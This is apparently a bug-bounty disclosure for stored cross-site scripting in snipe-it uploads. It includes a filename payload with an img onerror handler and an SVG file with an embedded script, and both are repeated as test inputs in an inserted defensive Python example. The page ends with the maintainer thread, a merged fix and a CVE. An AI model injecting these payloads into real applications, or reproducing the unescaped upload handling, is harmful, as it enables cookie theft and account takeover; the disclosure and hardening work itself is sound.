Cross-site Scripting (XSS) - Generic in snipe/snipe-it

Valid

Reported on

Oct 5th 2021


Description

File uploads allow arbitrary execution of JavaScript.

Steps to Reproduce

XSS via the filename

Go to the detail page of an asset.

In the Files tab, upload a file whose filename contains the payload: file'><img src=x onerror=alert(1)>name

XSS when uploading an .svg file (.svg is not in the list of allowed file types)

Go to the detail page of an asset.

In the Files tab, upload an SVG file containing the payload:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Once uploaded, click to download it.

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.
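As an added example, not code from this report or from snipe-it itself (which is a PHP/Laravel application), the following Python sketches the server-side controls that address the two vectors above: escaping the filename wherever it is echoed into HTML, enforcing the extension allow-list on the server rather than in the browser, rejecting SVG that carries script, and serving downloads with headers that stop a browser from rendering the file inline. The allow-list, helper names and sample inputs are constructed for illustration and do not reproduce snipe-it's real configuration.

```python
"""Server-side checks for the two upload vectors in the report (illustrative)."""
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import quote

# Constructed inputs modelled on the report: an HTML payload in a filename
# and an SVG document carrying a <script> element.
FILENAME_PAYLOAD = "file'><img src=x onerror=alert(1)>name.png"
SVG_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255)" />
   <script type="text/javascript">alert("XSS");</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'

# Hypothetical allow-list; snipe-it's real list is not reproduced here.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "doc", "docx", "xls", "xlsx"}


def render_link_unsafe(filename: str) -> str:
    """Vector 1 as reported: the stored name is echoed raw, so the quote and
    angle brackets in the name break out of the attribute and inject a tag."""
    return f"<a href='/files/{filename}'>{filename}</a>"


def render_link_safe(filename: str) -> str:
    """Hardened rendering: HTML-escape for the text node (quote=True also
    escapes ' and "), and percent-encode for the URL attribute."""
    return (f"<a href='/files/{quote(filename, safe='')}'>"
            f"{html.escape(filename, quote=True)}</a>")


def sanitize_filename(filename: str, max_len: int = 100) -> str:
    """Name to store and serve: drop any directory part, keep a conservative
    character set, cap the length. No quotes, CR or LF survive, so the result
    is also safe inside a Content-Disposition header."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = re.sub(r"[^A-Za-z0-9._-]", "_", base).strip("._")
    return (cleaned or "upload")[:max_len]


def extension_allowed(filename: str, allowed=ALLOWED_EXTENSIONS) -> bool:
    """Enforce the allow-list on the server; a client-side list is not a control."""
    if "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in allowed


def svg_has_active_content(data: bytes) -> bool:
    """Vector 2: flag SVG that can run script if ever rendered inline
    (<script>, <foreignObject>, on* handlers, javascript: hrefs).
    The stdlib parser does not fetch the external DTD; for untrusted input
    in production prefer defusedxml, which also blocks entity-expansion DoS."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return True  # unparseable input is rejected rather than trusted
    for el in root.iter():
        if el.tag.split("}", 1)[-1].lower() in ("script", "foreignobject"):
            return True
        for attr, value in el.attrib.items():
            name = attr.split("}", 1)[-1].lower()
            if name.startswith("on"):
                return True
            if name == "href" and value.strip().lower().startswith("javascript:"):
                return True
    return False


def download_headers(stored_name: str, content_type: str) -> dict:
    """Headers for the download endpoint: force 'attachment', forbid MIME
    sniffing, sandbox the response, and pass through only a short list of
    types so SVG and HTML are always served as opaque bytes."""
    passthrough = {"image/png", "image/jpeg", "image/gif", "application/pdf"}
    ctype = content_type if content_type in passthrough else "application/octet-stream"
    return {
        "Content-Type": ctype,
        "Content-Disposition": (f'attachment; filename="{stored_name}"; '
                                f"filename*=UTF-8''{quote(stored_name, safe='')}"),
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


def handle_upload(filename: str, data: bytes, allowed=ALLOWED_EXTENSIONS) -> dict:
    """The checks combined the way an upload handler would apply them."""
    if not extension_allowed(filename, allowed):
        return {"accepted": False, "reason": "extension not allowed"}
    if filename.lower().endswith(".svg") and svg_has_active_content(data):
        return {"accepted": False, "reason": "svg contains active content"}
    return {"accepted": True, "stored_name": sanitize_filename(filename),
            "display": render_link_safe(filename)}
```

Note that the second vector in the report is reachable only because the extension check was not enforced on the server; once it is, the SVG content check matters for deployments that deliberately allow .svg, which is why `handle_upload` takes the allow-list as a parameter.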

We have contacted a member of the snipe/snipe-it team and are waiting to hear back 2 months ago
snipe
2 months ago

Maintainer


Hi - thanks for this. I'm unclear on how this actually works IRL, though. We force a download for uploaded files, which means you'd have to download it, which means any image editor would nullify any JavaScript and any sessions attached to it.

If you can provide me with a little more detail on how you're seeing this work in the wild (screenshots would be great) we can take a look.

lethanhphuc
2 months ago

Researcher


Yes, you can check the video PoC here: PoC

snipe
2 months ago

Maintainer


Thanks so much - we’ll have a patch out shortly.

snipe validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe
2 months ago

Maintainer


I have a PR up against master right now, it's just awaiting QA finals

snipe confirmed that a fix has been merged on fc5efd 2 months ago
snipe has been awarded the fix bounty
lethanhphuc
2 months ago

Researcher


Thanks for the reward

Jamie Slome
a month ago

Admin


CVE published! 🎊

snipe
a month ago

Maintainer


🎉🎉😭🤣